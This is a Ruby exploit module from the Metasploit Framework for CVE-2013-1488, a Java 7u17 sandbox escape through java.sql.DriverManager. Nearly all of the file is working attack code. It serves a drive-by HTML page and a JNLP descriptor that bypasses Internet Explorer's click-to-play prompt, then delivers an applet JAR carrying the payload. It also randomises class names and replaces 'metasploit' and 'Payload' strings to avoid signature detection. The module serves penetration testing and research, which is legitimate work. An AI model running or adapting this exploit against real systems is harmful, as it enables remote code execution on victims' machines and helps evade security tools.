GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_driver_manager.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
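# Browser exploit module for CVE-2013-1488: java.sql.DriverManager calls
# toString() on user-supplied driver classes from inside a doPrivileged block
# (Java 7u17 and earlier). The module runs an HTTP server and answers by URI
# suffix with an HTML landing page, a JNLP descriptor, or the applet JAR
# assembled from the class files shipped under data/exploits/cve-2013-1488.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',
        'Description' => %q{
This module abuses the java.sql.DriverManager class where the toString() method
is called over user supplied classes from a doPrivileged block. The vulnerability
affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer
and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java
Web Start can be launched automatically through the ActiveX control. Otherwise, the
applet is launched without click-to-play bypass.
},
        'License' => MSF_LICENSE,
        'Author' => [
          'James Forshaw', # Vulnerability discovery and Analysis
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-1488' ],
          [ 'OSVDB', '91472' ],
          [ 'BID', '58504' ],
          [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],
          [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],
          [ 'ZDI', '13-076' ]
        ],
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA
            }
          ],
          [
            'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86
            }
          ],
          [
            'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-01-10',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the precompiled applet classes and the two META-INF service
  # descriptors from the data directory, randomizes the names that will
  # appear in served content, then delegates to the HTTP server setup.
  def setup
    @exploit_class = exploit_data_file('Exploit.class')
    @driver_class = exploit_data_file('FakeDriver.class')
    @driver2_class = exploit_data_file('FakeDriver2.class')
    @object_services = exploit_data_file('META-INF', 'services', 'java.lang.Object')
    @driver_services = exploit_data_file('META-INF', 'services', 'java.sql.Driver')

    # The random main-class name has exactly the length of 'Exploit', so the
    # in-place byte substitution leaves the class file's size unchanged.
    @exploit_class_name = rand_text_alpha('Exploit'.length)
    @exploit_class.gsub!('Exploit', @exploit_class_name)

    # Random basename of the JNLP descriptor referenced from #generate_html.
    @jnlp_name = rand_text_alpha(8)

    super
  end

  # Returns the JNLP descriptor as a String. Its href points back at this
  # server and its main-class is the randomized name chosen in #setup; the
  # vendor, description, jar and applet names are fresh random values per call.
  def jnlp_file
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

    %(
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
<information>
<title>Applet Test JNLP</title>
<vendor>#{rand_text_alpha(8)}</vendor>
<description>#{rand_text_alpha(8)}</description>
<offline-allowed/>
</information>

<resources>
<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
<jar href="#{rand_text_alpha(8)}.jar" main="true" />
</resources>
<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
<param name="__applet_ssv_validated" value="true"></param>
</applet-desc>
<update check="background"/>
</jnlp>
)
  end

  # HTTP dispatcher. Routes on the request URI suffix: ".jnlp" serves the
  # JNLP descriptor, ".jar" serves the applet JAR, a trailing "/" serves the
  # HTML landing page after regenerating the payload for this client, and
  # anything else is redirected to the resource root.
  #
  # @param cli the client connection handed in by the HTTP server mixin
  # @param request the parsed HTTP request; only +uri+ is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    # \z rather than $: the suffix must sit at the very end of the URI, not
    # merely at the end of a line inside it. Note that, unlike the randomized
    # file and class names, the Content-Type values are fixed across runs.
    case request.uri
    when /\.jnlp\z/i
      send_response(cli, jnlp_file, { 'Content-Type' => 'application/x-java-jnlp-file' })
    when /\.jar\z/i
      send_response(cli, build_applet_jar, { 'Content-Type' => 'application/octet-stream' })
    when %r{/\z}
      unless regenerate_payload(cli)
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Returns the HTML landing page as a String.
  # On Internet Explorer the <object> element instantiates the Java ActiveX
  # control with the JNLP URI as its "app" parameter (the click-to-play bypass
  # described in the module info); other browsers fall back to the nested
  # <applet> tag, which has no such bypass. The classid is constant across runs.
  def generate_html
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

    %(
<html>
<body>
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
<param name="app" value="#{jnlp_uri}">
<param name="back" value="true">
<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</object>
</body>
</html>
)
  end

  private

  # Reads one file shipped under data/exploits/cve-2013-1488 as binary.
  #
  # @param parts [Array<String>] path components below that directory
  # @return [String] the file contents (ASCII-8BIT)
  def exploit_data_file(*parts)
    File.binread(File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1488', *parts))
  end

  # Builds the applet JAR: the encoded payload JAR plus the exploit classes
  # and service descriptors loaded in #setup. Afterwards every entry name and
  # entry body has the 'metasploit' / 'Payload' markers replaced by random
  # strings of the same length, and the manifest is rebuilt.
  #
  # @return the jar object, ready to be sent as the response body
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file('FakeDriver.class', @driver_class)
    jar.add_file('FakeDriver2.class', @driver2_class)
    jar.add_file('META-INF/services/java.lang.Object', @object_services)
    jar.add_file('META-INF/services/java.sql.Driver', @driver_services)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str = rand_text_alpha('payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end
    jar.build_manifest
    jar
  end
end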